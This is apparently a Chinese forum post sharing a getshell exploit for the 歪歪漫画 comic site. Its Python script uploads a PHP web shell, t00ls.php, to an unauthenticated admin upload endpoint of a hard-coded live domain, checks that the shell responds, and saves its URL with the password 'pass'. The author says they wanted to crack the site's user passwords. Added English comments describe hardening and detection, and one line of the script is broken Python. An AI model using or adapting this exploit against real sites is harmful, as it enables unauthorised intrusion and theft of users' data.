
歪歪漫画前台无限制getshell


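这是前段时间拿到的一个 getshell。
由于网站用户密码是用 password_hash 存储的,解不开,所以现在才发出来。
从下面的脚本看,问题出在 /admin/FileUpload/uploadfile 这个上传接口:请求不带任何登录凭据,上传的文件名也是 .php,说明接口既没有做登录校验,也没有限制上传文件类型。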
需要安装requests库
用法:python 文件名.py

import requests
import json
from urllib.parse import urlparse

def upload_shell(url):
    """Send a local PHP file to the site's upload endpoint and probe the result.

    What the visible code does:
      * builds ``<url>/admin/FileUpload/uploadfile`` and POSTs the local file
        ``t00ls.php`` as the multipart field ``file``;
      * sends no cookies, headers or credentials with that POST, which matches
        the page's claim that the endpoint is reachable without logging in;
      * reads the JSON reply, joins its ``data`` value onto scheme + host of the
        request URL, and issues a GET to that address;
      * prints a message depending on the GET status (200 / 500 / 404) and, on
        200, writes the address to ``shell.txt`` in the working directory.

    Root cause on the server side (inferred from the request shape, not from
    server code shown here): an upload handler under ``/admin/`` that does not
    require an authenticated session, accepts a ``.php`` filename, and stores
    the file somewhere the web server will execute it.

    Hardening for the affected application:
      * enforce the admin session / authorization check on the upload route
        itself rather than only on the admin UI pages;
      * allow-list extensions and verify content server-side; generate the
        stored filename instead of trusting the client-supplied one;
      * keep uploads outside the web root, or disable script execution for the
        upload directory in the web-server configuration.

    Detection ideas:
      * POST requests to ``/admin/FileUpload/uploadfile`` with no admin session,
        followed shortly by a GET for a newly created ``.php`` path;
      * ``.php`` files appearing in upload/storage directories;
      * the default ``python-requests`` User-Agent, since no headers are set.

    Args:
        url: Base URL of the site; the endpoint path is appended verbatim.

    Returns:
        None. Every exception inside the ``try`` block is caught and printed.
    """
    # Earlier hard-coded endpoint left commented out by the author.
    #vn_url="http://www.wap.hgmh12.com/admin/FileUpload/uploadfile"
    vn_url = url + "/admin/FileUpload/uploadfile"
    # Multipart part named "file"; the client-chosen filename carries a .php
    # extension, so a server that trusts it stores an executable script.
    files={"file":("t00ls.php",open("t00ls.php","rb"))}
    try:
        # Unauthenticated request: nothing but the file part is supplied.
        res=requests.post(vn_url,files=files)
        res=res.json()
        # Reduce the request URL to scheme://host so the returned path can be
        # appended to it.
        domain = urlparse(vn_url)
        domain = domain.scheme+"://"+domain.netloc
        # NOTE(review): as rendered on this page the next line is not valid
        # Python, so the listing does not run as shown. Its intent appears to be
        # reading the "data" value from the JSON reply -- confirm against the
        # author's original file.
        shell_address = domain + res"data"
        # A plain GET is used as the success check; the status code alone
        # decides which branch runs.
        shell_code = requests.get(shell_address).status_code
        if shell_code == 200:
            print("[+] Success Url:%s"%shell_address)
            filename = 'shell.txt'
            # Opened with 'w', so any earlier shell.txt is truncated.
            with open(filename, 'w') as file_object:
                file_object.write("Success Url:%s"%shell_address%"密码:pass")
        elif shell_code == 500 :
            print("[-] Shell is 500 %s" % shell_address)
        elif shell_code == 404:
            print("[-] Faild Error")
        # Any other status code produces no output at all.
    except Exception as e:
        # Broad catch: network errors, non-JSON replies and local errors all
        # end up here and are only printed.
        print(e)
    
    



# Script entry: one call with a hard-coded base URL. The argument ends in "/"
# and upload_shell appends "/admin/FileUpload/uploadfile" verbatim, so the
# resulting request path likely begins with "//admin/..." -- include the
# doubled-slash form when searching access logs for this request.
upload_shell("https://www.yymh556.com/")